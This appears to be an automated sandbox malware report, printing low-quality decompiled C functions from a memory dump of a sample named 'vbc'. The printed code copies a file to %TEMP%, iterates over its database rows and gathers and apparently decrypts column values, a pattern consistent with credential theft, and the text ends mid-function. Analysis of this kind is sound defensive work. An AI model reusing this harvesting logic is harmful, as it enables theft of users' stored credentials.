                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CopyCountFileTick
                                                                                                    • String ID: %TEMP%$.tmp
                                                                                                    • API String ID: 3448371392-3650661790
                                                                                                    • Opcode ID: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
                                                                                                    • Instruction ID: 0e4f139da3bc19c2096e57fedbffea1b6a0c7ee0d64fc6893e7b5a554fe936bc
                                                                                                    • Opcode Fuzzy Hash: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
                                                                                                    • Instruction Fuzzy Hash: D0411F31904249AEDB01EBA1D852ACDBF79EF49308F50447BF500B76A3D67CAE458A58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410E60 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 47%
                                                                                                    			E00410E60(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v117;
				signed int _t70;
				signed int _t71;
				WCHAR* _t91;
				intOrPtr* _t106;
				intOrPtr _t108;
				intOrPtr* _t110;
				intOrPtr* _t114;
				intOrPtr* _t151;
				intOrPtr _t153;
				intOrPtr* _t155;
				void* _t157;
				intOrPtr* _t159;
				intOrPtr* _t163;
				void* _t165;
				intOrPtr* _t170;
				intOrPtr* _t176;
				intOrPtr* _t182;
				void* _t184;
				intOrPtr* _t188;
				void* _t191;
				intOrPtr _t212;
				intOrPtr _t214;
				void* _t220;
				intOrPtr _t226;
				intOrPtr _t230;
				intOrPtr _t231;
				void* _t232;
				void* _t233;

				_t228 = __esi;
				_t190 = __ebx;
				 *__eax =  *__eax | __eax;
				 *__eax =  *__eax + __eax;
				_t70 = __eax;
				 *_t70 =  *_t70 + _t70;
				_t71 = _t70 | 0x00000a00;
				 *_t71 =  *_t71 + _t71;
				_v117 = _v117 + __edx;
				_t230 = _t231;
				_t191 = 0xb;
				do {
					_push(0);
					_push(0);
					_t191 = _t191 - 1;
					_t240 = _t191;
				} while (_t191 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t71;
				E004040F4( &_v8);
				_push(_t230);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t231;
				E00403B80( &_v28);
				_push(_t230);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t231;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t240);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t240);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t190,  &_v40, _t240);
				E004062D8(L"%TEMP%",  &_v64, _t240);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t190,  &_v44, _t240);
				_t91 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t91, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t190, _t191,  &_v36, _t228, _t240);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t190, _t191) != 0) {
					_t106 =  *0x41b55c; // 0x41c784
					_t108 =  *((intOrPtr*)( *_t106))(E00403990(_v36),  &_v16);
					_t232 = _t231 + 8;
					__eflags = _t108;
					if(_t108 == 0) {
						E00408120(0x66,  &_v76);
						_t151 =  *0x41b5cc; // 0x41c78c
						_t153 =  *((intOrPtr*)( *_t151))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t233 = _t232 + 0x14;
						__eflags = _t153;
						if(_t153 == 0) {
							while(1) {
								_t155 =  *0x41b600; // 0x41c790
								_t157 =  *((intOrPtr*)( *_t155))(_v20);
								__eflags = _t157 - 0x64;
								if(_t157 != 0x64) {
									goto L11;
								}
								_t159 =  *0x41b644; // 0x41c798
								_t163 =  *0x41b588; // 0x41c794
								_t165 =  *((intOrPtr*)( *_t163))(_v20, 3,  *((intOrPtr*)( *_t159))(_v20, 3));
								_pop(_t220);
								E004094C4(_t165,  &_v48, _t220);
								E00403D2C( &_v80, _v48);
								_t170 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t170))(_v20, 0, 0x4111a4, _v80, _v28));
								_t176 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t176))(_v20, 1, 0x4111a4, _v84));
								_t182 =  *0x41b588; // 0x41c794
								_t184 =  *((intOrPtr*)( *_t182))(_v20, 2, 0x4111b0, _v88);
								_t233 = _t233 + 0x28;
								E00403C98( &_v92, _t184);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t188 =  *0x41b584; // 0x41b0b4
								 *_t188 =  *_t188 + 1;
								__eflags =  *_t188;
							}
						}
					}
					L11:
					_t110 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t110))(_v20);
					_t114 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t114))(_v16);
					_pop(_t212);
					 *[fs:eax] = _t212;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t226);
					 *[fs:eax] = _t226;
				}
				_pop(_t214);
				 *[fs:eax] = _t214;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}






















































                                                                                                    0x00410e60
                                                                                                    0x00410e60
                                                                                                    0x00410e60
                                                                                                    0x00410e62
                                                                                                    0x00410e64
                                                                                                    0x00410e66
                                                                                                    0x00410e68
                                                                                                    0x00410e6d
                                                                                                    0x00410e6f
                                                                                                    0x00410e71
                                                                                                    0x00410e73
                                                                                                    0x00410e78
                                                                                                    0x00410e78
                                                                                                    0x00410e7a
                                                                                                    0x00410e7c
                                                                                                    0x00410e7c
                                                                                                    0x00410e7c
                                                                                                    0x00410e7f
                                                                                                    0x00410e80
                                                                                                    0x00410e81
                                                                                                    0x00410e82
                                                                                                    0x00410e85
                                                                                                    0x00410e8b
                                                                                                    0x00410e92
                                                                                                    0x00410e93
                                                                                                    0x00410e98
                                                                                                    0x00410e9b
                                                                                                    0x00410ea1
                                                                                                    0x00410ea8
                                                                                                    0x00410ea9
                                                                                                    0x00410eae
                                                                                                    0x00410eb1
                                                                                                    0x00410ebc
                                                                                                    0x00410ec1
                                                                                                    0x00410ec7
                                                                                                    0x00410ecc
                                                                                                    0x00410ecf
                                                                                                    0x00410edc
                                                                                                    0x00410ee7
                                                                                                    0x00410ef4
                                                                                                    0x00410ef9
                                                                                                    0x00410efc
                                                                                                    0x00410f01
                                                                                                    0x00410f0c
                                                                                                    0x00410f17
                                                                                                    0x00410f21
                                                                                                    0x00410f30
                                                                                                    0x00410f3b
                                                                                                    0x00410f46
                                                                                                    0x00410f51
                                                                                                    0x00410f60
                                                                                                    0x00410f7c
                                                                                                    0x00410f83
                                                                                                    0x00410f85
                                                                                                    0x00410f88
                                                                                                    0x00410f8a
                                                                                                    0x00410fa2
                                                                                                    0x00410fb4
                                                                                                    0x00410fbb
                                                                                                    0x00410fbd
                                                                                                    0x00410fc0
                                                                                                    0x00410fc2
                                                                                                    0x00411091
                                                                                                    0x00411095
                                                                                                    0x0041109c
                                                                                                    0x0041109f
                                                                                                    0x004110a2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00410fd3
                                                                                                    0x00410fe6
                                                                                                    0x00410fed
                                                                                                    0x00410ff5
                                                                                                    0x00410ff6
                                                                                                    0x00411004
                                                                                                    0x00411017
                                                                                                    0x00411028
                                                                                                    0x0041103b
                                                                                                    0x0041104c
                                                                                                    0x0041105f
                                                                                                    0x00411066
                                                                                                    0x00411068
                                                                                                    0x00411070
                                                                                                    0x00411075
                                                                                                    0x00411078
                                                                                                    0x00411085
                                                                                                    0x0041108a
                                                                                                    0x0041108f
                                                                                                    0x0041108f
                                                                                                    0x0041108f
                                                                                                    0x00411091
                                                                                                    0x00410fc2
                                                                                                    0x004110a8
                                                                                                    0x004110ac
                                                                                                    0x004110b3
                                                                                                    0x004110ba
                                                                                                    0x004110c1
                                                                                                    0x004110c6
                                                                                                    0x004110c9
                                                                                                    0x004110de
                                                                                                    0x004110ec
                                                                                                    0x00410f62
                                                                                                    0x00410f64
                                                                                                    0x00410f67
                                                                                                    0x00410f67
                                                                                                    0x004110f3
                                                                                                    0x004110f6
                                                                                                    0x004110f9
                                                                                                    0x00411106
                                                                                                    0x0041110e
                                                                                                    0x00411116
                                                                                                    0x0041111e
                                                                                                    0x0041112b
                                                                                                    0x00411133
                                                                                                    0x00411140
                                                                                                    0x00411148
                                                                                                    0x00411155
                                                                                                    0x00411162

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32(00000000,004110CE,?,00000000,00411163,?,00000000,0041B0FC,00000000,00000000,00000000,?,004113F1,?,0041156C,?), ref: 00410EB4
                                                                                                    • CopyFileW.KERNEL32(00000000,00000000,000000FF), ref: 00410F30
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CopyCountFileTick
                                                                                                    • String ID: %TEMP%$.tmp
                                                                                                    • API String ID: 3448371392-3650661790
                                                                                                    • Opcode ID: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
                                                                                                    • Instruction ID: 2c73a4ceecea9b7a55c8e1441bd033eb3759b1d2195d340dd4b2e4f4f6784083
                                                                                                    • Opcode Fuzzy Hash: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
                                                                                                    • Instruction Fuzzy Hash: DF412131904149AFDB01FFA1D842ACDBBB9EF49318F50447BF500B36A2D67CAE458A58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410E68 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 46%
                                                                                                    			E00410E68(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v117;
				signed int _t70;
				WCHAR* _t90;
				intOrPtr* _t105;
				intOrPtr _t107;
				intOrPtr* _t109;
				intOrPtr* _t113;
				intOrPtr* _t150;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;
				intOrPtr* _t158;
				intOrPtr* _t162;
				void* _t164;
				intOrPtr* _t169;
				intOrPtr* _t175;
				intOrPtr* _t181;
				void* _t183;
				intOrPtr* _t187;
				void* _t190;
				intOrPtr _t211;
				intOrPtr _t213;
				void* _t219;
				intOrPtr _t225;
				intOrPtr _t229;
				intOrPtr _t230;
				void* _t231;
				void* _t232;

				_t227 = __esi;
				_t189 = __ebx;
				_t70 = __eax | 0x00000a00;
				 *_t70 =  *_t70 + _t70;
				_v117 = _v117 + __edx;
				_t229 = _t230;
				_t190 = 0xb;
				do {
					_push(0);
					_push(0);
					_t190 = _t190 - 1;
					_t238 = _t190;
				} while (_t190 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t70;
				E004040F4( &_v8);
				_push(_t229);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t230;
				E00403B80( &_v28);
				_push(_t229);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t230;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t238);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t238);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t189,  &_v40, _t238);
				E004062D8(L"%TEMP%",  &_v64, _t238);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t189,  &_v44, _t238);
				_t90 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t90, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t189, _t190,  &_v36, _t227, _t238);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t189, _t190) != 0) {
					_t105 =  *0x41b55c; // 0x41c784
					_t107 =  *((intOrPtr*)( *_t105))(E00403990(_v36),  &_v16);
					_t231 = _t230 + 8;
					__eflags = _t107;
					if(_t107 == 0) {
						E00408120(0x66,  &_v76);
						_t150 =  *0x41b5cc; // 0x41c78c
						_t152 =  *((intOrPtr*)( *_t150))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t232 = _t231 + 0x14;
						__eflags = _t152;
						if(_t152 == 0) {
							while(1) {
								_t154 =  *0x41b600; // 0x41c790
								_t156 =  *((intOrPtr*)( *_t154))(_v20);
								__eflags = _t156 - 0x64;
								if(_t156 != 0x64) {
									goto L10;
								}
								_t158 =  *0x41b644; // 0x41c798
								_t162 =  *0x41b588; // 0x41c794
								_t164 =  *((intOrPtr*)( *_t162))(_v20, 3,  *((intOrPtr*)( *_t158))(_v20, 3));
								_pop(_t219);
								E004094C4(_t164,  &_v48, _t219);
								E00403D2C( &_v80, _v48);
								_t169 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t169))(_v20, 0, 0x4111a4, _v80, _v28));
								_t175 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t175))(_v20, 1, 0x4111a4, _v84));
								_t181 =  *0x41b588; // 0x41c794
								_t183 =  *((intOrPtr*)( *_t181))(_v20, 2, 0x4111b0, _v88);
								_t232 = _t232 + 0x28;
								E00403C98( &_v92, _t183);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t187 =  *0x41b584; // 0x41b0b4
								 *_t187 =  *_t187 + 1;
								__eflags =  *_t187;
							}
						}
					}
					L10:
					_t109 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t109))(_v20);
					_t113 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t113))(_v16);
					_pop(_t211);
					 *[fs:eax] = _t211;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t225);
					 *[fs:eax] = _t225;
				}
				_pop(_t213);
				 *[fs:eax] = _t213;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}





















































                                                                                                    0x00410e68
                                                                                                    0x00410e68
                                                                                                    0x00410e68
                                                                                                    0x00410e6d
                                                                                                    0x00410e6f
                                                                                                    0x00410e71
                                                                                                    0x00410e73
                                                                                                    0x00410e78
                                                                                                    0x00410e78
                                                                                                    0x00410e7a
                                                                                                    0x00410e7c
                                                                                                    0x00410e7c
                                                                                                    0x00410e7c
                                                                                                    0x00410e7f
                                                                                                    0x00410e80
                                                                                                    0x00410e81
                                                                                                    0x00410e82
                                                                                                    0x00410e85
                                                                                                    0x00410e8b
                                                                                                    0x00410e92
                                                                                                    0x00410e93
                                                                                                    0x00410e98
                                                                                                    0x00410e9b
                                                                                                    0x00410ea1
                                                                                                    0x00410ea8
                                                                                                    0x00410ea9
                                                                                                    0x00410eae
                                                                                                    0x00410eb1
                                                                                                    0x00410ebc
                                                                                                    0x00410ec1
                                                                                                    0x00410ec7
                                                                                                    0x00410ecc
                                                                                                    0x00410ecf
                                                                                                    0x00410edc
                                                                                                    0x00410ee7
                                                                                                    0x00410ef4
                                                                                                    0x00410ef9
                                                                                                    0x00410efc
                                                                                                    0x00410f01
                                                                                                    0x00410f0c
                                                                                                    0x00410f17
                                                                                                    0x00410f21
                                                                                                    0x00410f30
                                                                                                    0x00410f3b
                                                                                                    0x00410f46
                                                                                                    0x00410f51
                                                                                                    0x00410f60
                                                                                                    0x00410f7c
                                                                                                    0x00410f83
                                                                                                    0x00410f85
                                                                                                    0x00410f88
                                                                                                    0x00410f8a
                                                                                                    0x00410fa2
                                                                                                    0x00410fb4
                                                                                                    0x00410fbb
                                                                                                    0x00410fbd
                                                                                                    0x00410fc0
                                                                                                    0x00410fc2
                                                                                                    0x00411091
                                                                                                    0x00411095
                                                                                                    0x0041109c
                                                                                                    0x0041109f
                                                                                                    0x004110a2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00410fd3
                                                                                                    0x00410fe6
                                                                                                    0x00410fed
                                                                                                    0x00410ff5
                                                                                                    0x00410ff6
                                                                                                    0x00411004
                                                                                                    0x00411017
                                                                                                    0x00411028
                                                                                                    0x0041103b
                                                                                                    0x0041104c
                                                                                                    0x0041105f
                                                                                                    0x00411066
                                                                                                    0x00411068
                                                                                                    0x00411070
                                                                                                    0x00411075
                                                                                                    0x00411078
                                                                                                    0x00411085
                                                                                                    0x0041108a
                                                                                                    0x0041108f
                                                                                                    0x0041108f
                                                                                                    0x0041108f
                                                                                                    0x00411091
                                                                                                    0x00410fc2
                                                                                                    0x004110a8
                                                                                                    0x004110ac
                                                                                                    0x004110b3
                                                                                                    0x004110ba
                                                                                                    0x004110c1
                                                                                                    0x004110c6
                                                                                                    0x004110c9
                                                                                                    0x004110de
                                                                                                    0x004110ec
                                                                                                    0x00410f62
                                                                                                    0x00410f64
                                                                                                    0x00410f67
                                                                                                    0x00410f67
                                                                                                    0x004110f3
                                                                                                    0x004110f6
                                                                                                    0x004110f9
                                                                                                    0x00411106
                                                                                                    0x0041110e
                                                                                                    0x00411116
                                                                                                    0x0041111e
                                                                                                    0x0041112b
                                                                                                    0x00411133
                                                                                                    0x00411140
                                                                                                    0x00411148
                                                                                                    0x00411155
                                                                                                    0x00411162

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32(00000000,004110CE,?,00000000,00411163,?,00000000,0041B0FC,00000000,00000000,00000000,?,004113F1,?,0041156C,?), ref: 00410EB4
                                                                                                    • CopyFileW.KERNEL32(00000000,00000000,000000FF), ref: 00410F30
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CopyCountFileTick
                                                                                                    • String ID: %TEMP%$.tmp
                                                                                                    • API String ID: 3448371392-3650661790
                                                                                                    • Opcode ID: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
                                                                                                    • Instruction ID: 3bd2312418c75e2bfd4f88111c3886d823680ea6e83d1d6075c9c2a9f0993f15
                                                                                                    • Opcode Fuzzy Hash: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
                                                                                                    • Instruction Fuzzy Hash: 4241013190410DAEDB01FFA1D842ADDBBB9EF49318F50447BF500B36A2D77DAE458A58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410BB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 47%
                                                                                                    			E00410BB0(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				signed int _t57;
				signed int _t58;
				WCHAR* _t78;
				intOrPtr* _t93;
				void* _t95;
				intOrPtr* _t97;
				intOrPtr* _t101;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr* _t138;
				void* _t140;
				intOrPtr* _t142;
				intOrPtr* _t148;
				void* _t150;
				void* _t156;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t186;
				intOrPtr _t190;
				intOrPtr _t191;
				void* _t192;
				void* _t193;

				_t188 = __esi;
				_t155 = __ebx;
				_t57 = __eax +  *__eax;
				 *_t57 =  *_t57 + _t57;
				_t58 = _t57 | 0x5500000a;
				_t190 = _t191;
				_t156 = 9;
				do {
					_push(0);
					_push(0);
					_t156 = _t156 - 1;
					_t197 = _t156;
				} while (_t156 != 0);
				_push(_t156);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t58;
				E004040F4( &_v8);
				_push(_t190);
				_push(0x410e20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				E00403B80( &_v28);
				_push(_t190);
				_push(0x410da0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t197);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t197);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t155,  &_v40, _t197);
				E004062D8(L"%TEMP%",  &_v60, _t197);
				_push(_v60);
				_push(E00410E58);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t155,  &_v44, _t197);
				_t78 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t78, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t155, _t156,  &_v36, _t188, _t197);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t155, _t156) != 0) {
					_t93 =  *0x41b55c; // 0x41c784
					_t95 =  *((intOrPtr*)( *_t93))(E00403990(_v36),  &_v16);
					_t192 = _t191 + 8;
					__eflags = _t95;
					if(_t95 == 0) {
						E00408120(0x65,  &_v72);
						_t134 =  *0x41b5cc; // 0x41c78c
						_t136 =  *((intOrPtr*)( *_t134))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t193 = _t192 + 0x14;
						__eflags = _t136;
						if(_t136 == 0) {
							while(1) {
								_t138 =  *0x41b600; // 0x41c790
								_t140 =  *((intOrPtr*)( *_t138))(_v20);
								__eflags = _t140 - 0x64;
								if(_t140 != 0x64) {
									goto L11;
								}
								_t142 =  *0x41b588; // 0x41c794
								E00403C98( &_v76,  *((intOrPtr*)( *_t142))(_v20, 0, _v28));
								_t148 =  *0x41b588; // 0x41c794
								_t150 =  *((intOrPtr*)( *_t148))(_v20, 1, E00410E60, _v76);
								_t193 = _t193 + 0x10;
								E00403C98( &_v80, _t150);
								_push(_v80);
								_push(E00410E68);
								E00403E1C();
							}
						}
					}
					L11:
					_t97 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t97))(_v20);
					_t101 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t101))(_v16);
					_pop(_t176);
					 *[fs:eax] = _t176;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t186);
					 *[fs:eax] = _t186;
				}
				_pop(_t178);
				 *[fs:eax] = _t178;
				_push(E00410E27);
				E00403B98( &_v80, 2);
				E004034E4( &_v72);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}












































                                                                                                    0x00410bb0
                                                                                                    0x00410bb0
                                                                                                    0x00410bb0
                                                                                                    0x00410bb2
                                                                                                    0x00410bb4
                                                                                                    0x00410bb9
                                                                                                    0x00410bbb
                                                                                                    0x00410bc0
                                                                                                    0x00410bc0
                                                                                                    0x00410bc2
                                                                                                    0x00410bc4
                                                                                                    0x00410bc4
                                                                                                    0x00410bc4
                                                                                                    0x00410bc7
                                                                                                    0x00410bc8
                                                                                                    0x00410bc9
                                                                                                    0x00410bca
                                                                                                    0x00410bcb
                                                                                                    0x00410bce
                                                                                                    0x00410bd4
                                                                                                    0x00410bdb
                                                                                                    0x00410bdc
                                                                                                    0x00410be1
                                                                                                    0x00410be4
                                                                                                    0x00410bea
                                                                                                    0x00410bf1
                                                                                                    0x00410bf2
                                                                                                    0x00410bf7
                                                                                                    0x00410bfa
                                                                                                    0x00410c05
                                                                                                    0x00410c0a
                                                                                                    0x00410c10
                                                                                                    0x00410c15
                                                                                                    0x00410c18
                                                                                                    0x00410c25
                                                                                                    0x00410c30
                                                                                                    0x00410c3d
                                                                                                    0x00410c42
                                                                                                    0x00410c45
                                                                                                    0x00410c4a
                                                                                                    0x00410c55
                                                                                                    0x00410c60
                                                                                                    0x00410c6a
                                                                                                    0x00410c79
                                                                                                    0x00410c84
                                                                                                    0x00410c8f
                                                                                                    0x00410c9a
                                                                                                    0x00410ca9
                                                                                                    0x00410cc5
                                                                                                    0x00410ccc
                                                                                                    0x00410cce
                                                                                                    0x00410cd1
                                                                                                    0x00410cd3
                                                                                                    0x00410ceb
                                                                                                    0x00410cfd
                                                                                                    0x00410d04
                                                                                                    0x00410d06
                                                                                                    0x00410d09
                                                                                                    0x00410d0b
                                                                                                    0x00410d67
                                                                                                    0x00410d6b
                                                                                                    0x00410d72
                                                                                                    0x00410d75
                                                                                                    0x00410d78
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00410d18
                                                                                                    0x00410d29
                                                                                                    0x00410d3c
                                                                                                    0x00410d43
                                                                                                    0x00410d45
                                                                                                    0x00410d4d
                                                                                                    0x00410d52
                                                                                                    0x00410d55
                                                                                                    0x00410d62
                                                                                                    0x00410d62
                                                                                                    0x00410d67
                                                                                                    0x00410d0b
                                                                                                    0x00410d7a
                                                                                                    0x00410d7e
                                                                                                    0x00410d85
                                                                                                    0x00410d8c
                                                                                                    0x00410d93
                                                                                                    0x00410d98
                                                                                                    0x00410d9b
                                                                                                    0x00410db0
                                                                                                    0x00410dbe
                                                                                                    0x00410cab
                                                                                                    0x00410cad
                                                                                                    0x00410cb0
                                                                                                    0x00410cb0
                                                                                                    0x00410dc5
                                                                                                    0x00410dc8
                                                                                                    0x00410dcb
                                                                                                    0x00410dd8
                                                                                                    0x00410de0
                                                                                                    0x00410de8
                                                                                                    0x00410df0
                                                                                                    0x00410dfd
                                                                                                    0x00410e05
                                                                                                    0x00410e12
                                                                                                    0x00410e1f

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32(00000000,00410DA0,?,00000000,00410E20,?,00000000,0041B0FC,00000000,00000008,00000000,00000000,?,00411311,?,0041156C), ref: 00410BFD
                                                                                                    • CopyFileW.KERNEL32(00000000,00000000,000000FF), ref: 00410C79
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CopyCountFileTick
                                                                                                    • String ID: %TEMP%$.tmp
                                                                                                    • API String ID: 3448371392-3650661790
                                                                                                    • Opcode ID: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
                                                                                                    • Instruction ID: ad1686550c7843c0884c0506788be05dc1fde737249d1bd281ecbc27d8194f8d
                                                                                                    • Opcode Fuzzy Hash: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
                                                                                                    • Instruction Fuzzy Hash: BF412330914109AEDB01FF91D952ADDBBBDEF49318F50447BF400B7292D77CAE458A58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410BB4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 46%
                                                                                                    			E00410BB4(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				signed int _t57;
				WCHAR* _t77;
				intOrPtr* _t92;
				void* _t94;
				intOrPtr* _t96;
